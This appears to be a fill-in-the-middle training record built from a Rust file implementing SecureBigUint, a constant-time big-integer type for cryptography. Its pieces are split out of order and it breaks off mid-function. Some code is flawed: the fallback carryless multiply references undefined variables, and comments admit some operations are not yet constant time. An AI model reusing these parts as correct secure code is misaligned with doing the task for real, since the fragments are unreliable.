}
/// Computes the quotient and remainder of 'self / rhs'.
///
/// Any mixture of input bit_widths is supported.
/// Internally this uses binary long division.
///
/// NOTE: This is very slow and should be avoided if possible.
///
/// Returns a tuple of '(self / rhs, self % rhs)' where the quotient is the
/// same width as 'self' and the remainder is the same width as 'rhs'.
fn quorem(&self, rhs: &Self) -> (Self, Self) {
let mut q = Self::from_usize(0, self.bit_width()); // Range is [0, Self]
let mut r = Self::from_usize(0, rhs.bit_width()); // Range is [0, rhs).
// TODO: Implement a bit iterator so set_bit requires less work.
for i in (0..self.bit_width()).rev() {
let carry = r.shl();
r.set_bit(0, self.bit(i));
let mut next_r = Self::from_usize(0, rhs.bit_width());
// If there is a carry, then we know that r might be > rhs when the shl also has
// a carry.
let carry2 = r.overflowing_sub_to(rhs, &mut next_r);
let subtract = (carry != 0) == carry2;
next_r.copy_if(subtract, &mut r);
q.set_bit(i, if subtract { 1 } else { 0 });
}
(q, r)
}
fn value_bits(&self) -> usize {
for i in (0..self.value.len()).rev() {
let zeros = self.value[i].leading_zeros() as usize;
if zeros == BASE_BITS {
continue;
}
return (i * BASE_BITS) + (BASE_BITS - zeros);
}
0
}
fn bit_width(&self) -> usize {
self.value.len() * BASE_BITS
}
}
impl SecureBigUint {
pub fn byte_width(&self) -> usize {
self.value.len() * BASE_BYTES
}
/// Multiplies two numbers and adds their result to the out number.
/// out += self*rhs
pub(super) fn add_mul_to(&self, rhs: &Self, out: &mut Self) {
let a = &self.value[..];
let b = &rhs.value[..];
for i in 0..a.len() {
let mut carry = 0;
for j in 0..b.len() {
// TODO: Ensure this uses the UMAAL instruction on ARM
let tmp = ((a[i] as u64) * (b[j] as u64)) + (out.value[i + j] as u64) + carry;
carry = tmp >> BASE_BITS;
out.value[i + j] = tmp as u32;
}
for k in (i + b.len())..out.value.len() {
let tmp = (out.value[k] as u64) + carry;
carry = tmp >> BASE_BITS;
out.value[k] = tmp as u32;
}
}
}
/// Copies 'self' to 'out' if should_copy is true. In all cases, this takes
/// a constant amount of time to execute.
///
/// NOTE: 'self' and 'out' must have the same bit_width().
#[inline(never)]
pub fn copy_if(&self, should_copy: bool, out: &mut Self) {
assert_eq!(self.value.len(), out.value.len());
// Will be 0b111...111 if should_copy else 0.
let self_mask = (!(should_copy as BaseType)).wrapping_add(1);
let out_mask = !self_mask;
for (self_v, out_v) in self.value.iter().zip(out.value.iter_mut()) {
*out_v = (*self_v & self_mask).wrapping_add(*out_v & out_mask);
}
}
/// Swaps the contents of 'self' and 'other' if 'should_swap' is true.
///
/// The actual values of both integers are swapped rather than swapping any
/// internal memory pointers so that 'should_swap' can not be inferred from
/// the memory locations of the final integers.
///
/// At a given integer bit_width, this should always take the same amount of
/// CPU cycles to execute.
#[inline(never)]
pub fn swap_if(&mut self, other: &mut Self, should_swap: bool) {
assert_eq!(self.value.len(), other.value.len());
// Will be 0b111...111 if should_swap else 0.
let mask = (!(should_swap as BaseType)).wrapping_add(1);
for (self_v, other_v) in self.value.iter_mut().zip(other.value.iter_mut()) {
// Will be 0 if we don't want to swap.
let filter = mask & (*self_v ^ *other_v);
*self_v ^= filter;
*other_v ^= filter;
}
}
/// In-place reverses all the order of all bits in this integer.
pub fn reverse_bits(&mut self) {
let mid = (self.value.len() + 1) / 2;
for i in 0..mid {
let j = self.value.len() - 1 - i;
// Swap if we are not at the middle limb (only relevant if we have an odd number
// of limbs).
if i != j {
self.value.swap(i, j);
self.value[j] = self.value[j].reverse_bits();
}
self.value[i] = self.value[i].reverse_bits();
}
}
/// Performs 'self ^= rhs' only if 'should_apply' is true.
pub fn xor_assign_if(&mut self, should_apply: bool, rhs: &Self) {
assert_eq!(self.value.len(), rhs.value.len());
// Will be 0b111...111 if should_apply else 0.
let mask = (!(should_apply as BaseType)).wrapping_add(1);
for i in 0..self.value.len() {
self.value[i] ^= rhs.value[i] & mask;
}
}
pub fn discard(&mut self, bit_width: usize) {
let n = ceil_div(bit_width, BASE_BITS);
self.value.truncate(n);
}
///
pub fn truncate(&mut self, bit_width: usize) {
let n = ceil_div(bit_width, BASE_BITS);
// TODO: Also zero out any high bits
for i in n..self.value.len() {
assert_eq!(self.value[i], 0);
}
self.value.truncate(n);
}
/// Computes 2^n more efficiently than using pow().
/// Only supports exponents smaller than u32.
/// TODO: Just take as input a u32 directly.
pub fn exp2(n: u32, bit_width: usize) -> Self {
let mut out = Self::from_usize(0, bit_width);
out.set_bit(n as usize, 1);
out
}
pub fn is_zero(&self) -> bool {
let mut is = true;
for v in &self.value {
is &= *v == 0;
}
is
}
/// TODO: Improve the constant time behavior of this.
/// It would be useful to have a conditional form of this that adds like
/// subtraction by zero.
pub(super) fn overflowing_sub_assign(&mut self, rhs: &Self) -> bool {
let mut carry = 0;
let n = self.value.len();
for i in 0..n {
// rhs is allowed to be narrower than self
let r_i = if i < rhs.value.len() { rhs.value[i] } else { 0 };
// TODO: Try to use overflowing_sub instead (that way we don't need to go to
// 64bits)
let v = (self.value[i] as i64) - (r_i as i64) + carry;
if v < 0 {
self.value[i] = (v + (u32::max_value() as i64) + 1) as u32;
carry = -1;
} else {
self.value[i] = v as u32;
carry = 0;
}
}
carry != 0
}
pub(super) fn overflowing_sub_to(&self, rhs: &Self, out: &mut Self) -> bool {
let mut carry = 0;
let n = out.value.len();
for i in 0..n {
let a = self.value.get(i).cloned().unwrap_or(0);
let b = rhs.value.get(i).cloned().unwrap_or(0);
// TODO: Try to use overflowing_sub instead (that way we don't need to go to
// 64bits)
let v = (a as i64) - (b as i64) + carry;
if v < 0 {
out.value[i] = (v + (u32::max_value() as i64) + 1) as u32;
carry = -1;
} else {
out.value[i] = v as u32;
carry = 0;
}
}
carry != 0
}
/// Performs modular reduction using up to one subtraction of the modulus
/// from the value. | reduced.copy_if(!overflow, self);
self.truncate(modulus.bit_width());
}
#[must_use]
pub fn shl(&mut self) -> BaseType {
let mut carry = 0;
for v in self.value.iter_mut() {
let (new_v, _) = v.overflowing_shl(1);
let new_carry = *v >> 31;
*v = new_v | carry;
carry = new_carry;
}
carry
}
pub fn shr(&mut self) {
let mut carry = 0;
for v in self.value.iter_mut().rev() {
let (new_v, _) = v.overflowing_shr(1);
let new_carry = *v & 1;
*v = new_v | (carry << 31);
carry = new_carry;
}
}
/// Computes 'self >>= n'
/// NOTE: We assume that 'n' is a publicly known constant.
pub fn shr_n(&mut self, n: usize) {
let byte_shift = n / BASE_BITS;
let carry_size = n % BASE_BITS;
let carry_mask = ((1 as BaseType) << carry_size).wrapping_sub(1);
for i in 0..self.value.len() {
let v = self.value[i];
self.value[i] = 0;
if i < byte_shift {
continue;
}
let j = i - byte_shift;
self.value[j] = v >> carry_size;
if carry_size != 0 && j > 0 {
let carry = v & carry_mask;
self.value[j - 1] |= carry << (BASE_BITS - carry_size);
}
}
}
/// Computes self >>= BASE_BITS.
pub(super) fn shr_base(&mut self) {
assert_eq!(self.value[0], 0);
for j in 1..self.value.len() {
self.value[j - 1] = self.value[j];
}
let k = self.value.len();
self.value[k - 1] = 0;
}
pub fn and_assign(&mut self, rhs: &Self) {
for i in 0..self.value.len() {
self.value[i] &= rhs.value[i];
}
}
/// Efficienctly (in O(1) time) computes 'self % 2^32'
pub fn mod_word(&self) -> u32 {
if self.value.len() == 0 {
0
} else {
self.value[0]
}
}
// TODO: Need a version of this using pmull in aarch64 (vmull_p64)
/// Interprates this integer and 'rhs' as polynomials over GF(2^n) and
/// multiplies them into 'out'.
///
/// Operations in this field:
/// - Addition is XOR
/// - Multiplication is AND
#[cfg(all(target_arch = "x86_64", target_feature = "pclmulqdq"))]
pub fn carryless_mul_to(&self, rhs: &Self, out: &mut Self) {
use crate::intrinsics::*;
use core::arch::x86_64::_mm_clmulepi64_si128;
assert!(out.bit_width() >= self.bit_width() + rhs.bit_width() - 1);
out.assign_zero();
for i in 0..self.value.len() {
let a = u64_to_m128i(self.value[i] as u64);
for j in 0..rhs.value.len() {
let b = u64_to_m128i(rhs.value[j] as u64);
let r = u64_from_m128i(unsafe { _mm_clmulepi64_si128(a, b, 0) });
let rl = r as u32;
let rh = (r >> 32) as u32;
// Add to output
out.value[i + j] ^= rl;
out.value[i + j + 1] ^= rh;
}
}
}
// TODO: Finish making this constant time and correct.
#[cfg(not(all(target_arch = "x86_64", target_feature = "pclmulqdq")))]
pub fn carryless_mul_to(&self, rhs: &Self, out: &mut Self) {
assert!(out.bit_width() >= self.bit_width() + rhs.bit_width() - 1);
out.assign_zero();
for i in 0..b.value_bits() {
out.xor_assign_if(b.bit(i) == 1, &a);
a.shl();
}
}
// TODO: Move to a shared utility.
pub fn to_string_radix(&self, radix: u32) -> alloc::string::String {
// TODO: These should be global constants (as well as one)
let zero = Self::from_usize(0, self.bit_width());
let div = Self::from_usize(radix as usize, 32);
let mut s = alloc::string::String::new();
let mut tmp = self.clone();
while tmp > zero {
// TODO: We can divide by a larger power of 10 to make this more efficient.
let (q, r) = tmp.quorem(&div);
tmp = q;
// TODO: Very inefficient
s.insert(
0,
core::char::from_digit(r.value.first().cloned().unwrap_or(0), radix).unwrap(),
);
}
if s.len() == 0 {
s.push('0');
}
s
}
/// Resets the value of the integer to 0.
pub fn assign_zero(&mut self) {
for v in self.value.iter_mut() {
*v = 0;
}
}
/// In-place increases the size
pub fn extend(&mut self, bit_width: usize) {
let new_len = ceil_div(bit_width, BASE_BITS);
assert!(new_len >= self.value.len());
self.value.resize(new_len, 0);
}
pub fn from_str(s: &str, bit_width: usize) -> common::errors::Result<Self> {
let ten = SecureBigUint::from_usize(10, 32);
let mut out = Self::from_usize(0, bit_width);
for c in s.chars() {
let digit = c
.to_digit(10)
.ok_or(common::errors::err_msg("Invalid digit"))?;
let tmp = out.clone();
ten.mul_to(&tmp, &mut out);
out += SecureBigUint::from_usize(digit as usize, bit_width);
// out = (&out * &ten) + &(digit as usize).into();
}
Ok(out)
}
}
impl core::fmt::Display for SecureBigUint {
fn fmt(&self, f: &mut core::fmt::Formatter<'_>) -> core::fmt::Result {
write!(f, "{}", self.to_string_radix(10))
}
}
impl Ord for SecureBigUint {
fn cmp(&self, other: &Self) -> Ordering {
let mut less = 0;
let mut greater = 0;
let n = core::cmp::max(self.value.len(), other.value.len());
for i in (0..n).rev() {
let mask = !(less | greater);
let a = self.value.get(i).cloned().unwrap_or(0);
let b = other.value.get(i).cloned().unwrap_or(0);
if a < b {
less |= mask & 1;
} else if a > b {
greater |= mask & 1;
}
}
let cmp = (less << 1) | greater;
let mut out = Ordering::Equal;
// Exactly one of these if statements should always be triggered.
if cmp == 0b10 {
out = Ordering::Less;
}
if cmp == 0b01 {
out = Ordering::Greater;
}
if cmp == 0b00 {
out = Ordering::Equal;
}
out
}
}
impl PartialEq for SecureBigUint {
fn eq(&self, other: &Self) -> bool {
self.cmp(other) == Ordering::Equal
}
}
impl Eq for SecureBigUint {}
impl PartialOrd for SecureBigUint {
fn partial_cmp(&self, other: &Self) -> Option<Ordering> {
Some(self.cmp(other))
}
}
impl_op_ex!(+= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
Integer::add_assign(lhs, rhs)
});
impl_op_commutative!(+ |lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
// NOTE: Does not use add_into to avoid risking an overflow.
Integer::add(&lhs, rhs)
});
impl_op!(+ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
Integer::add(lhs, rhs)
});
impl_op_ex!(-= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
Integer::sub_assign(lhs, rhs)
});
impl_op_ex!(-|lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { lhs.sub_into(rhs) });
impl_op!(-|lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { Integer::sub(lhs, rhs) });
impl_op_ex!(
*|lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { Integer::mul(lhs, rhs) }
);
impl_op_ex!(/ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (q, _) = lhs.quorem(rhs);
q
});
impl_op!(% |lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (_, r) = lhs.quorem(rhs);
r
});
impl_op!(% |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (_, r) = lhs.quorem(rhs);
r
});
impl_op_ex!(^= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
assert_eq!(lhs.value.len(), rhs.value.len());
for (lhs_value, rhs_value) in lhs.value.iter_mut().zip(rhs.value.iter()) {
*lhs_value ^= *rhs_value;
}
});
impl_op_ex!(^ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
assert_eq!(lhs.value.len(), rhs.value.len());
let mut out = SecureBigUint::from_usize(0, lhs.bit_width());
for i in 0..out.value.len() {
out.value[i] = lhs.value[i] ^ rhs.value[i];
}
out
});
#[cfg(test)]
mod tests {
use super::*;
use core::str::FromStr;
#[test]
fn secure_biguint_test() {
// TODO: Check multiplication in x*0 and x*1 cases
let seven = SecureBigUint::from_usize(7, 64);
let one_hundred = SecureBigUint::from_usize(100, 64);
assert!(one_hundred > seven);
assert!(seven < one_hundred);
assert!(one_hundred == one_hundred);
assert!(seven == seven);
let mut seven_hundred = SecureBigUint::from_usize(0, 64);
seven.mul_to(&one_hundred, &mut seven_hundred);
assert!(seven_hundred == SecureBigUint::from_usize(700, 64));
let x = SecureBigUint::from_le_bytes(&[0xff, 0xff, 0xff, 0xff]);
let mut temp = SecureBigUint::from_usize(0, 64);
x.mul_to(&x, &mut temp);
assert_eq!(
&temp.to_le_bytes(),
&(core::u32::MAX as u64).pow(2).to_le_bytes()
);
let (q, r) = temp.quorem(&x);
// Equal to 'x' extended to 64 bits
assert!(q == SecureBigUint::from_le_bytes(&[0xff, 0xff, 0xff, 0xff, 0, 0, 0, 0]));
assert!(r == SecureBigUint::from_usize(0, 32));
let (q, r) = one_hundred.quorem(&seven);
assert!(q == SecureBigUint::from_usize(14, 64));
assert!(r == SecureBigUint::from_usize(2, 64));
let (q, r) = seven.quorem(&one_hundred);
assert!(q == SecureBigUint::from_usize(0, 64));
assert!(r == SecureBigUint::from_usize(7, 64));
// TODO: Test larger numbers.
}
#[test]
fn shr_n_test() {
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0]);
v.shr_n(1);
assert_eq!(&v.to_be_bytes(), &[0b00001010, 0, 0, 0]);
}
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0]);
v.shr_n(8);
assert_eq!(&v.to_be_bytes(), &[0, 0b00010100, 0, 0]);
}
// Testing moving values across bases.
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0, 0, 0, 0, 0]);
v.shr_n(32);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b00010100, 0, 0, 0]);
}
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0, 0, 0, 0, 0]);
v.shr_n(34);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b00000101, 0, 0, 0]);
}
// Carry to second base.
{
let mut v = SecureBigUint::from_be_bytes(&[0, 0, 0, 1, 0, 0, 0, 0]);
v.shr_n(1);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b10000000, 0, 0, 0]);
}
}
} | ///
/// Will panic if 'self' was >= 2*modulus
pub fn reduce_once(&mut self, modulus: &Self) {
let mut reduced = Self::from_usize(0, self.bit_width());
let overflow = self.overflowing_sub_to(modulus, &mut reduced); | random_line_split |
uint.rs | use alloc::vec::Vec;
use common::ceil_div;
use core::cmp::Ord;
use core::cmp::Ordering;
use core::marker::PhantomData;
use core::ops;
use core::ops::Div;
use core::ops::Index;
use core::ops::IndexMut;
use generic_array::{arr::AddLength, ArrayLength, GenericArray};
use typenum::Quot;
use typenum::{Prod, U32};
use crate::integer::Integer;
use crate::matrix::dimension::*;
use crate::number::{One, Zero};
/*
pub trait StorageType<D: Dimension>:
Clone + AsRef<[u32]> + AsMut<[u32]> + Index<usize, Output = u32> + IndexMut<usize, Output = u32>
{
/// Allocates a new buffer with at least 'words' number of items.
fn alloc(words: usize) -> Self;
}
impl StorageType<Dynamic> for Vec<u32> {
fn alloc(words: usize) -> Self {
vec![0; words]
}
}
*/
pub(super) type BaseType = u32;
pub(super) const BASE_BITS: usize = 32;
const BASE_BYTES: usize = core::mem::size_of::<BaseType>();
const BITS_PER_BYTE: usize = 8;
/// Big unsigned integer implementation intended for security critical
/// use-cases.
///
/// Internally each instance stores a fixed size storage buffer based on the bit
/// width used to initialize the integer. All numerical operations are constant
/// time for a given storage buffer size unless otherwise specified. This means
/// that we assume that the buffer widths are publicly known and don't vary with
/// the value of the integer.
///
/// Special care must be taken to ensure that the width of integers generated by
/// operations is kept under control:
/// - Addition (a + b) will output integers with space for one extra carry bit.
/// - Multiplication (a*b) will output integers with double the space.
/// - Operations like quorem (a % b) or truncate can be used to re-contrain the
/// width of integers.
#[derive(Clone, Debug)]
pub struct SecureBigUint {
/// In little endian 32bits at a time.
/// Will be padded with
///
/// TODO: We can make this an enum to support passing in '&mut [BaseType]'
pub(super) value: Vec<BaseType>,
}
impl SecureBigUint {
/// Creates an integer from a small value that fits within a usize. The
/// buffer used to store this number will be able to store at least 'width'
/// bits.
pub fn from_usize(value: usize, width: usize) -> Self {
let mut data = vec![0; ceil_div(width, BASE_BITS)];
data[0] = value as BaseType;
Self { value: data }
}
}
impl Integer for SecureBigUint {
/// Creates an integer from little endian bytes representing the number.
///
/// The width of the integer is inferred from data.len().
/// The caller is responsible for ensuring that data.len() is a well known
/// constant.
fn from_le_bytes(data: &[u8]) -> Self {
let mut out = Self::from_usize(0, BITS_PER_BYTE * data.len());
let n = data.len() / BASE_BYTES;
for i in 0..(data.len() / BASE_BYTES) {
out.value[i] = BaseType::from_le_bytes(*array_ref![data, BASE_BYTES * i, BASE_BYTES]);
}
let rem = data.len() % BASE_BYTES;
if rem != 0 {
let mut rest = [0u8; BASE_BYTES];
rest[0..rem].copy_from_slice(&data[(data.len() - rem)..]);
out.value[n] = BaseType::from_le_bytes(rest);
}
out
}
/// Converts the integer to little endian bytes.
///
/// NOTE: This may have zero significant padding depending on the internal
/// representation.
fn to_le_bytes(&self) -> Vec<u8> {
let mut data = vec![];
data.reserve_exact(self.value.len() * BASE_BYTES);
for v in &self.value {
data.extend_from_slice(&v.to_le_bytes());
}
data
}
fn from_be_bytes(data: &[u8]) -> Self {
let mut out = Self::from_usize(0, BITS_PER_BYTE * data.len());
let n = data.len() / BASE_BYTES;
for i in 0..(data.len() / BASE_BYTES) {
out.value[i] = BaseType::from_be_bytes(*array_ref![
data,
data.len() - (BASE_BYTES * (i + 1)),
BASE_BYTES
]);
}
let rem = data.len() % BASE_BYTES;
if rem != 0 {
let mut rest = [0u8; BASE_BYTES];
rest[(BASE_BYTES - rem)..].copy_from_slice(&data[0..rem]);
out.value[n] = BaseType::from_be_bytes(rest);
}
out
}
fn to_be_bytes(&self) -> Vec<u8> {
let mut data = vec![];
data.reserve_exact(self.value.len() * 4);
for v in self.value.iter().rev() {
data.extend_from_slice(&v.to_be_bytes());
}
data
}
/// Computes and returns 'self + rhs'. The output buffer will be 1 bit
/// larger than the inputs to accomadate possible overflow.
fn add(&self, rhs: &Self) -> Self {
let mut out = Self::from_usize(0, core::cmp::max(self.bit_width(), rhs.bit_width()) + 1);
self.add_to(rhs, &mut out);
out
}
/// Computes 'output = self + rhs'. It is the user's responsibility to
/// ensure that the
fn add_to(&self, rhs: &Self, output: &mut Self) {
assert!(output.value.len() >= self.value.len());
assert!(output.value.len() >= rhs.value.len());
let mut carry = 0;
// TODO: Always loop through max(self, rhs, output) length so we know for sure
// that all carries are handled.
let n = output.value.len();
for i in 0..n {
let a = self.value.get(i).cloned().unwrap_or(0);
let b = rhs.value.get(i).cloned().unwrap_or(0);
let v = (a as u64) + (b as u64) + carry;
output.value[i] = v as BaseType;
carry = v >> 32;
}
assert_eq!(carry, 0);
}
/// Computes 'self += rhs'.
fn add_assign(&mut self, rhs: &Self) {
let mut carry = 0;
let n = self.value.len();
for i in 0..n {
let v = (self.value[i] as u64) + (rhs.value[i] as u64) + carry;
self.value[i] = v as u32;
carry = v >> 32;
}
assert_eq!(carry, 0);
}
fn sub(&self, rhs: &Self) -> Self {
let mut out = self.clone();
out.sub_assign(rhs);
out
}
/// It would be useful to have a conditional form of this that adds like
/// subtraction by zero.
fn sub_assign(&mut self, rhs: &Self) {
assert!(!self.overflowing_sub_assign(rhs));
}
fn mul(&self, rhs: &Self) -> Self {
let mut out = Self::from_usize(0, self.bit_width() + rhs.bit_width());
self.mul_to(rhs, &mut out);
out
}
/// O(n^2) multiplication. Assumes that u64*u64 multiplication is always
/// constant time.
///
/// 'out' must be twice the size of
fn mul_to(&self, rhs: &Self, out: &mut Self) {
out.assign_zero();
let mut overflowed = false;
for i in 0..self.value.len() {
let mut carry = 0;
for j in 0..rhs.value.len() {
// TODO: Ensure this uses the UMAAL instruction on ARM
let tmp = ((self.value[i] as u64) * (rhs.value[j] as u64))
+ (out.value[i + j] as u64)
+ carry;
carry = tmp >> BASE_BITS;
out.value[i + j] = tmp as BaseType;
}
// assert!(carry <= u32::max_value() as u64);
if i + rhs.value.len() < out.value.len() {
out.value[i + rhs.value.len()] = carry as BaseType;
} else {
overflowed |= carry != 0;
}
}
assert!(!overflowed);
}
fn bit(&self, i: usize) -> usize {
((self.value[i / BASE_BITS] >> (i % BASE_BITS)) & 0b01) as usize
}
fn set_bit(&mut self, i: usize, v: usize) {
assert!(v == 0 || v == 1);
let ii = i / BASE_BITS;
let shift = i % BASE_BITS;
let mask = !(1 << shift);
self.value[ii] = (self.value[ii] & mask) | ((v as BaseType) << shift);
}
/// Computes the quotient and remainder of 'self / rhs'.
///
/// Any mixture of input bit_widths is supported.
/// Internally this uses binary long division.
///
/// NOTE: This is very slow and should be avoided if possible.
///
/// Returns a tuple of '(self / rhs, self % rhs)' where the quotient is the
/// same width as 'self' and the remainder is the same width as 'rhs'.
fn quorem(&self, rhs: &Self) -> (Self, Self) {
let mut q = Self::from_usize(0, self.bit_width()); // Range is [0, Self]
let mut r = Self::from_usize(0, rhs.bit_width()); // Range is [0, rhs).
// TODO: Implement a bit iterator so set_bit requires less work.
for i in (0..self.bit_width()).rev() {
let carry = r.shl();
r.set_bit(0, self.bit(i));
let mut next_r = Self::from_usize(0, rhs.bit_width());
// If there is a carry, then we know that r might be > rhs when the shl also has
// a carry.
let carry2 = r.overflowing_sub_to(rhs, &mut next_r);
let subtract = (carry != 0) == carry2;
next_r.copy_if(subtract, &mut r);
q.set_bit(i, if subtract { 1 } else { 0 });
}
(q, r)
}
fn value_bits(&self) -> usize {
for i in (0..self.value.len()).rev() {
let zeros = self.value[i].leading_zeros() as usize;
if zeros == BASE_BITS {
continue;
}
return (i * BASE_BITS) + (BASE_BITS - zeros);
}
0
}
fn bit_width(&self) -> usize {
self.value.len() * BASE_BITS
}
}
impl SecureBigUint {
pub fn byte_width(&self) -> usize {
self.value.len() * BASE_BYTES
}
/// Multiplies two numbers and adds their result to the out number.
/// out += self*rhs
pub(super) fn add_mul_to(&self, rhs: &Self, out: &mut Self) {
let a = &self.value[..];
let b = &rhs.value[..];
for i in 0..a.len() {
let mut carry = 0;
for j in 0..b.len() {
// TODO: Ensure this uses the UMAAL instruction on ARM
let tmp = ((a[i] as u64) * (b[j] as u64)) + (out.value[i + j] as u64) + carry;
carry = tmp >> BASE_BITS;
out.value[i + j] = tmp as u32;
}
for k in (i + b.len())..out.value.len() {
let tmp = (out.value[k] as u64) + carry;
carry = tmp >> BASE_BITS;
out.value[k] = tmp as u32;
}
}
}
/// Copies 'self' to 'out' if should_copy is true. In all cases, this takes
/// a constant amount of time to execute.
///
/// NOTE: 'self' and 'out' must have the same bit_width().
#[inline(never)]
pub fn copy_if(&self, should_copy: bool, out: &mut Self) {
assert_eq!(self.value.len(), out.value.len());
// Will be 0b111...111 if should_copy else 0.
let self_mask = (!(should_copy as BaseType)).wrapping_add(1);
let out_mask = !self_mask;
for (self_v, out_v) in self.value.iter().zip(out.value.iter_mut()) {
*out_v = (*self_v & self_mask).wrapping_add(*out_v & out_mask);
}
}
/// Swaps the contents of 'self' and 'other' if 'should_swap' is true.
///
/// The actual values of both integers are swapped rather than swapping any
/// internal memory pointers so that 'should_swap' can not be inferred from
/// the memory locations of the final integers.
///
/// At a given integer bit_width, this should always take the same amount of
/// CPU cycles to execute.
#[inline(never)]
pub fn swap_if(&mut self, other: &mut Self, should_swap: bool) {
assert_eq!(self.value.len(), other.value.len());
// Will be 0b111...111 if should_swap else 0.
let mask = (!(should_swap as BaseType)).wrapping_add(1);
for (self_v, other_v) in self.value.iter_mut().zip(other.value.iter_mut()) {
// Will be 0 if we don't want to swap.
let filter = mask & (*self_v ^ *other_v);
*self_v ^= filter;
*other_v ^= filter;
}
}
/// In-place reverses all the order of all bits in this integer.
pub fn reverse_bits(&mut self) {
let mid = (self.value.len() + 1) / 2;
for i in 0..mid {
let j = self.value.len() - 1 - i;
// Swap if we are not at the middle limb (only relevant if we have an odd number
// of limbs).
if i != j {
self.value.swap(i, j);
self.value[j] = self.value[j].reverse_bits();
}
self.value[i] = self.value[i].reverse_bits();
}
}
/// Performs 'self ^= rhs' only if 'should_apply' is true.
pub fn xor_assign_if(&mut self, should_apply: bool, rhs: &Self) {
assert_eq!(self.value.len(), rhs.value.len());
// Will be 0b111...111 if should_apply else 0.
let mask = (!(should_apply as BaseType)).wrapping_add(1);
for i in 0..self.value.len() {
self.value[i] ^= rhs.value[i] & mask;
}
}
pub fn discard(&mut self, bit_width: usize) {
let n = ceil_div(bit_width, BASE_BITS);
self.value.truncate(n);
}
///
pub fn truncate(&mut self, bit_width: usize) {
let n = ceil_div(bit_width, BASE_BITS);
// TODO: Also zero out any high bits
for i in n..self.value.len() {
assert_eq!(self.value[i], 0);
}
self.value.truncate(n);
}
/// Computes 2^n more efficiently than using pow().
/// Only supports exponents smaller than u32.
/// TODO: Just take as input a u32 directly.
pub fn exp2(n: u32, bit_width: usize) -> Self {
let mut out = Self::from_usize(0, bit_width);
out.set_bit(n as usize, 1);
out
}
pub fn is_zero(&self) -> bool {
let mut is = true;
for v in &self.value {
is &= *v == 0;
}
is
}
/// TODO: Improve the constant time behavior of this.
/// It would be useful to have a conditional form of this that adds like
/// subtraction by zero.
pub(super) fn overflowing_sub_assign(&mut self, rhs: &Self) -> bool {
let mut carry = 0;
let n = self.value.len();
for i in 0..n {
// rhs is allowed to be narrower than self
let r_i = if i < rhs.value.len() { rhs.value[i] } else { 0 };
// TODO: Try to use overflowing_sub instead (that way we don't need to go to
// 64bits)
let v = (self.value[i] as i64) - (r_i as i64) + carry;
if v < 0 {
self.value[i] = (v + (u32::max_value() as i64) + 1) as u32;
carry = -1;
} else {
self.value[i] = v as u32;
carry = 0;
}
}
carry != 0
}
pub(super) fn overflowing_sub_to(&self, rhs: &Self, out: &mut Self) -> bool {
let mut carry = 0;
let n = out.value.len();
for i in 0..n {
let a = self.value.get(i).cloned().unwrap_or(0);
let b = rhs.value.get(i).cloned().unwrap_or(0);
// TODO: Try to use overflowing_sub instead (that way we don't need to go to
// 64bits)
let v = (a as i64) - (b as i64) + carry;
if v < 0 {
out.value[i] = (v + (u32::max_value() as i64) + 1) as u32;
carry = -1;
} else {
out.value[i] = v as u32;
carry = 0;
}
}
carry != 0
}
/// Performs modular reduction using up to one subtraction of the modulus
/// from the value.
///
/// Will panic if 'self' was >= 2*modulus
pub fn reduce_once(&mut self, modulus: &Self) {
let mut reduced = Self::from_usize(0, self.bit_width());
let overflow = self.overflowing_sub_to(modulus, &mut reduced);
reduced.copy_if(!overflow, self);
self.truncate(modulus.bit_width());
}
#[must_use]
pub fn shl(&mut self) -> BaseType {
let mut carry = 0;
for v in self.value.iter_mut() {
let (new_v, _) = v.overflowing_shl(1);
let new_carry = *v >> 31;
*v = new_v | carry;
carry = new_carry;
}
carry
}
pub fn shr(&mut self) {
let mut carry = 0;
for v in self.value.iter_mut().rev() {
let (new_v, _) = v.overflowing_shr(1);
let new_carry = *v & 1;
*v = new_v | (carry << 31);
carry = new_carry;
}
}
/// Computes 'self >>= n'
/// NOTE: We assume that 'n' is a publicly known constant.
pub fn | (&mut self, n: usize) {
let byte_shift = n / BASE_BITS;
let carry_size = n % BASE_BITS;
let carry_mask = ((1 as BaseType) << carry_size).wrapping_sub(1);
for i in 0..self.value.len() {
let v = self.value[i];
self.value[i] = 0;
if i < byte_shift {
continue;
}
let j = i - byte_shift;
self.value[j] = v >> carry_size;
if carry_size != 0 && j > 0 {
let carry = v & carry_mask;
self.value[j - 1] |= carry << (BASE_BITS - carry_size);
}
}
}
/// Computes self >>= BASE_BITS.
pub(super) fn shr_base(&mut self) {
assert_eq!(self.value[0], 0);
for j in 1..self.value.len() {
self.value[j - 1] = self.value[j];
}
let k = self.value.len();
self.value[k - 1] = 0;
}
pub fn and_assign(&mut self, rhs: &Self) {
for i in 0..self.value.len() {
self.value[i] &= rhs.value[i];
}
}
/// Efficienctly (in O(1) time) computes 'self % 2^32'
pub fn mod_word(&self) -> u32 {
if self.value.len() == 0 {
0
} else {
self.value[0]
}
}
// TODO: Need a version of this using pmull in aarch64 (vmull_p64)
/// Interprates this integer and 'rhs' as polynomials over GF(2^n) and
/// multiplies them into 'out'.
///
/// Operations in this field:
/// - Addition is XOR
/// - Multiplication is AND
#[cfg(all(target_arch = "x86_64", target_feature = "pclmulqdq"))]
pub fn carryless_mul_to(&self, rhs: &Self, out: &mut Self) {
use crate::intrinsics::*;
use core::arch::x86_64::_mm_clmulepi64_si128;
